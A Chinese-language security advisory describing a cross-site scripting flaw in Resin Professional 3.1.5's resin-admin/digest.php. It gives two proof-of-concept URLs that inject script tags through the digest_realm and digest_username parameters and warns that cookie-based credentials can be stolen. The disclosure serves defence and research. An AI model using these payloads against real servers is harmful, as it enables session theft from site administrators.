受影响系统:
Caucho Technology Resin Professional 3.1.5
描述:
Resin是一款由Caucho Technology开发的WEB服务器,可使用在Microsoft Windows操作系统下。
Resin的resin-admin/digest.php页面错误地使用了REQUEST方式接受多个参数,远程攻击者可以通过提交恶意参数请求执行跨站脚本攻击,导致窃取基于Cookie的认证凭据。
<*来源:xuanmumu (xuanmumu@gmail.com)
链接:http://marc.info/?l=bugtraq&m=127428273900680&w=2
*>
测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://test.com/resin-admin/digest.php?digest_attempt=1&digest_realm="><script>alert("ZnVjayBjbnZk")</script><a&digest_username[]=
http://test.com/resin-admin/digest.php?digest_attempt=1&digest_username="><script>alert("ZnVjayBjbnZk")</script><a
建议:
厂商补丁:
Caucho Technology
—————–
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
0 条评论。